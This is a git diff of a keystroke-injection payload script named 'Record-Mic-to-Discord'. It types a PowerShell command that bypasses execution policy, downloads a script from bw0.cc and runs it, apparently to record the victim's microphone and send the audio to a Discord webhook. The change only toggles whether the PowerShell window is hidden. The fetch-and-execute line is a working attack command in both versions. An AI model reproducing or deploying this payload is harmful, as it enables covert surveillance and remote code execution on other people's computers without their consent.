diff --git a/Record-Mic-to-Discord/Record-Mic-to-Discord.txt b/Record-Mic-to-Discord/Record-Mic-to-Discord.txt index 0ddb867..e8178c6 100644 --- a/Record-Mic-to-Discord/Record-Mic-to-Discord.txt +++ b/Record-Mic-to-Discord/Record-Mic-to-Discord.txt @@ -14,7 +14,7 @@ REM open powershell (remove "-W H" to show the window) DELAY 1000 GUI r DELAY 750 -STRING powershell -Ep Bypass -W H -C $dc = 'YOUR_WEBHOOK_HERE'; iex (irm bw0.cc/dcmic) +STRING powershell -Ep Bypass -C $dc = 'YOUR_WEBHOOK_HERE'; iex (irm bw0.cc/dcmic) ENTER